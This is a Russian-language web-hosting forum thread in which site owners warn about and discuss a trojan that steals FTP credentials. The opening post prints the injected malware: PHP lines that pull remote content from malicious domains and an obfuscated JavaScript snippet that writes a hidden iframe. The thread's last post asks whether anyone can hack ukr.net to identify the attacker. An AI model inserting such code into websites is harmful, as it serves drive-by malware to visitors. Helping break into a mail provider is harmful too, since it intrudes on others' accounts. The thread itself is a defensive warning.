FreeHost.com.UA

Технические вопросы => Общие вопросы => Тема начата: jeux от Октября 21, 2007, 12:02:02 pm



Название: Внимание ходит ТРОЯН
Отправлено: jeux от Октября 21, 2007, 12:02:02 pm
Код:
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
Код:
<!-- o65 --><script language="JavaScript">eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C98%2C111%2C114%2C100%2C101%2C114%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C32%2C110%2C111%2C110%2C101%2C59%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C48%2C49%2C50%2C49%2C46%2C48%2C49%2C51%2C55%2C46%2C48%2C50%2C50%2C53%2C46%2C48%2C49%2C52%2C54%2C47%2C37%2C51%2C48%2C37%2C51%2C49%2C37%2C54%2C67%2C37%2C54%2C55%2C37%2C52%2C51%2C37%2C54%2C53%2C37%2C54%2C65%2C37%2C54%2C69%2C47%2C37%2C54%2C70%2C37%2C55%2C53%2C37%2C55%2C52%2C37%2C50%2C69%2C37%2C54%2C56%2C37%2C55%2C52%2C37%2C54%2C68%2C37%2C54%2C67%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));</script><!-- c65 -->

Данный вредоносоный код поразил такие файлы на моем сайте:
index.php
login.php
index.html
index.htm

Во всех папках.
Внесение вредносного кода происходит путе доступа через FTP.Угроза исходит от машины на которой хранятся учетные записи с паролями и производится доступ через ФТП к сайту(пр этом пароли не обезательно могут хранится).
Возможные пути заражения:
1.Через заход IE на инфицированые Ресурсы.
2.Через ТОТАЛ командер - не знаю как.
Антивирусы в болшенстве не находят Троян.Но у меня нашел в КЕШЕ докторо Веб скрипт какой-то.

Зражение по логам происходило с таких IP:
203.121.67.117
81.95.152.16


Сейчас походу - это эпидемия.Как с ним бороться не знаю.Возможно даже он буфер собирате.Советую сменить пароли на ФТП и пока с зараженной машины ими не пользоваться.И решать проблему с вирусом на машинке.




Название: Re: Внимание ходит ТРОЯН
Отправлено: Серёга от Ноября 26, 2007, 04:10:45 pm
так он заражает компы,или просто дописывает свой код в сайт?


Название: Re: Внимание ходит ТРОЯН
Отправлено: setevoй_червь™ от Декабря 19, 2007, 10:18:41 pm
Сначала троянец проникает с другого зараженного сайта ,на который вы заходили, и подгружает другого трояна - downloader-а, который в свою очередь загружает ещё несколько, и среди них - троян который собственно и ворует вашу конфедициальную информацию, в данном случае - логин и пароль ФТП-доступа. После этого, под вашими данными доступа он подключается к серверу, и вносит зловредные изменения, при чем они могут нескольких видов - от просто порчи/частичного стирания кода, до просто внесения вышеприведенного примера кода.

Меры безопасности, для защиты от него стандартные - устанавливайте антивирус и фаервол, старайтесь не хранить конфедициальных данных на компьютере, не заходите с чужих компьютеров, не пользуйтесь услугами интернет-кафе.


Название: Re: Внимание ходит ТРОЯН
Отправлено: Nick от Марта 25, 2008, 12:08:59 pm
Что-то не вяжется. Доступ к сайту через ФТП есть всего у 2-х машин. Обе - чистые. Более того, на ВСЕ файлы в корне установлены права r-xr--r-- , но эта зараза всё равно умудряется дописать себя.. ХТТП логи чисты, там нет криминала.

Где и как увидеть логи доступа к сайту?


Спасибо.


Название: Re: Внимание ходит ТРОЯН
Отправлено: setevoй_червь™ от Марта 25, 2008, 09:05:10 pm
Для получения логов - напишите запрос с контактного имейла аккаунта.

А самое главное - если такое случилось, то смените пароли ФТП-пользователям. Сделать это можно в админпанели в разделе ФТП-пользователи, нажав справа от логина пользователя иконку Редактировать.


Название: Re: Внимание ходит ТРОЯН
Отправлено: Nick от Марта 25, 2008, 09:13:09 pm
ФТП пароли сменил сразу. На одной машине рекомендованый тут антивирус нашёл несколько троянов (хотя NOD32 в упор молчал)
Будем посмотреть, возможно, проблема локализована и устранена..


Название: Re: Внимание ходит ТРОЯН
Отправлено: aprel от Июня 11, 2008, 01:48:32 am
Не храните пароли от ФТП-аккаунтов в ФТП-клиентах.
Каждый нормальный ФТП-клиент предупредит вас строчкой перед строкой ввода пароля, что хранить здесь пароль небезопасно.


Название: Re: Внимание ходит ТРОЯН
Отправлено: мережевий хробачок™ от Августа 12, 2008, 09:57:33 am
Вот нашел интересную ссылочку:
http://www.securitylab.ru/forum/forum16/topic46619/messages/#message376065


Название: Re: Внимание ходит ТРОЯН
Отправлено: hardlock от Сентября 22, 2008, 01:29:51 pm
Здравствуйте!

значит ситуация такая.
- ставлю чистую винду (ради эксперимента) WinXP SP3 + касперского 7.
-подключаюсь к сети и обновляю касперского.
- меняю пароль на ФТП
- заливаю через WEB-интерфейс ZIP архив и индексными страничками, он там распаковывается.
- Проверяю странички - всё нормально.
- ОПЯТЬ МЕНЯЮ ПАРОЛЬ на новый (генерю кнопкой). Его помню только я (нигде не сохраняю).
- Через 12 часов индексы опять заменены! КАК?

Мне кажется что это проблема не в моей машине...


Название: Re: Внимание ходит ТРОЯН
Отправлено: PC_DOS от Сентября 22, 2008, 02:16:53 pm
Значит ктото имеет к тебе доступ из вне,так как за 12 часов можно не только опять же хакнуть машину,а снести все пароли и файлы(Может каспер крякнутый виром стоит).Каспер обходится очень легко и злоумышленник получает полноценный доступ к компу.Если у тебя пару локальных дисков форматни все,если есть программы вроде TeamViewer удаляй.Закрой удаленное пользование,поставь фаервол или закрой порты 139,135,найди нормальный антивир,поставь анти бэкхеды и кейгены.А еще лучше узнай у провайдера у кого из сети есть такой же ИП,если что купи белый,ставь защиту и радуйся.Никто не может сделать с твоим сайтом такое,если ты не внимательно все сделал,а лучше проверь сам сайт нет ли в нем еще какихто вредоносных кодов,если используешь платформу Dle,то можеш поставить антивирЪ.Админам оно надо?Саппорту оно надо?Это все зависит от тебя и только.Храни пароли не на компе а в голове или запиши на кусок бумаги и не сохраняй их в браузере,пока не найдешь гада или закроешь все доступы из внутри.Не используй акк с кем то еще на стороне.Следи за своими лучшими друзьями. Большое количество аккаунтов теряются именно таким путем.Само собой, не принимай и не открывай неизвестные файлы от незнакомых людей.


Название: Re: Внимание ходит ТРОЯН
Отправлено: unknown php developer от Марта 12, 2009, 05:50:28 pm
Linux - таблетка от всего.


Название: Re: Внимание ходит ТРОЯН
Отправлено: Kartinamirainfo от Мая 04, 2009, 12:01:22 am
1 - Рекомендуемый антивирус Авира(Тех. поддержка компании рекомендует антивирус
http://dl5.avgate.net/down/windows/antivir_workstation_win7u_en_h.exe С большинством троянов этой серии справляется отлично.) полечил некоторые трояны, но глюк остался.
2 - Проверил я файлы на сервере (в фаре посмотрел аштимэлины) - оказалось что они нормальные, без левого скрипта. Выяснил, что скрипт вставляют браузеры (Мозилла, ИЕ) в сохранённые страницы.
3 - Семантек Нортон Антивирус 2009 сразу вылечил обсуждаемый троян, он был в дллене Дримвивера.
4 - Позднее при полном скане Нортон Антивирус 2009 нашёл троян в инсталляхе Дримвивера, а точнее в файле генерации ключа для русской версии 8.0.

Или описанный мной случай той же категории что и обсуждаемый здесь. Или другой. Если да - супер. Если нет - успехов всем!


Название: Re: Внимание ходит ТРОЯН
Отправлено: unknown php developer от Мая 04, 2009, 02:22:07 am
А тем временем линуксоиды вообще не знают что такое антивирусы и зачем они  ;D


Название: Re: Внимание ходит ТРОЯН
Отправлено: AMBA от Мая 04, 2009, 03:57:59 am
Это точно, ибо если уж их ломают, то никакой антивирь не поможет  8)


Название: Re: Внимание ходит ТРОЯН
Отправлено: ..::Guooff::.. от Мая 31, 2009, 11:12:17 pm
у меня тоже такая же проблема вроде справился...., вот теперь жду когда google обновит свои данные и моём сайт, следовательно пропадёт это окно
(http://s59.radikal.ru/i166/0905/51/b57d90d16a2e.jpg)

а вообще вирусы у меня в основном в index файлах и в файлах кмпонентов и самого движка (joomla 1.5)
Вот так они выглядели

(http://i072.radikal.ru/0905/3b/0ad2d94316cd.png)
(http://s44.radikal.ru/i103/0905/de/3d6f74015a76.png)
(http://i002.radikal.ru/0905/2c/6c79b0729704.png)

но а жду этой повторной диагностики от google`a уже 2ю неделю даже чуть больше)))) кто ни будь не подскажет ли как ускорить это время ожидания, а то постояльце (большая часть) зная что это ложное окно предупреждения но всё же обходят стороной....


Название: Re: Внимание ходит ТРОЯН
Отправлено: Thorin от Мая 31, 2009, 11:36:14 pm
но а жду этой повторной диагностики от google`a уже 2ю неделю даже чуть больше)))) кто ни будь не подскажет ли как ускорить это время ожидания, а то постояльце (большая часть) зная что это ложное окно предупреждения но всё же обходят стороной....
у меня тоже когда то было с одним сайтом, нужно зайти в панель инструментов для веб-мастеров https://www.google.com/webmasters/tools/dashboard если сайт добавлен там будет красным предупреждение, перейти по ссылке, и там что то типа "да я убрал вирусы проверьте сайт еще раз" по моему 1-2 дня и красная табличка пропала)


Название: Re: Внимание ходит ТРОЯН
Отправлено: ..::Guooff::.. от Июня 01, 2009, 12:25:23 am
спасибо) сейчас займусь  ;)


Название: Re: Внимание ходит ТРОЯН
Отправлено: unknown php developer от Июня 01, 2009, 08:41:21 am
Это все винда и галочка "запоминать пароли"


Название: Re: Внимание ходит ТРОЯН
Отправлено: aprel от Июня 01, 2009, 12:29:42 pm
причем второе — основополагающая причина


Название: Re: Внимание ходит ТРОЯН
Отправлено: Nikolas от Мая 25, 2011, 03:45:22 pm
Если уже так получилось, что файлы заражены, чем же это лечить? Например в джумле файлов немерено, заражены именно те которые в своем имени имеют ".html". Как полечить все сразу?


Название: Re: Внимание ходит ТРОЯН
Отправлено: Komintern от Мая 25, 2011, 04:08:37 pm
> заражены именно те которые в своем имени имеют ".html"

какие права установлены на каталоги и на файлы?
мы делаем резервные копии, так что пишите на сапорт с указанием даты за которую вам восстановить акаунт.


Название: Re:Внимание ходит ТРОЯН
Отправлено: мережевий хробачок™ от Июля 12, 2011, 05:16:33 pm
Хоспаде, эта тема все ещё актуальна? Ужас...  :o


Название: Re:Внимание ходит ТРОЯН
Отправлено: ukrlist от Июля 16, 2011, 02:34:30 am
Хоспаде, эта тема все ещё актуальна? Ужас...  :o

актуальна.. сам недавно подцепил.


Название: Re:Внимание ходит ТРОЯН
Отправлено: AMBA от Июля 19, 2011, 02:04:58 pm
А мне попадаются хитрожопые троянописатели, тихо тырят пароли от фтп, потом смотрят что там за сайты, и если стоящий большой сайт - вешают код сапы, причём прячут его, так чтоб он виден был только поисковикам.

Сапа мне слила данные одного такого деятеля:
Цитировать
Данные злоумышленника:
E-Mail ***@ukr.net
WMR кошелек R***

Только толку от этого 0. IP они не сказали, вебмани - без вариантов, укрнеет только ментам что-то может сказать о владельце ящика (в ментовку идти бесперспективно, ибо для них это всё настолько эфимерные материи: трояны, сапы, гипотетический ущерб... Доказать что-то нереально), времени прошло прилично и в логах фрихоста тоже уже ничего не осталось...
Кто-то умеет ломать укрнет, или связи мож какие есть, чтоб достать оттуда данные засранца? :)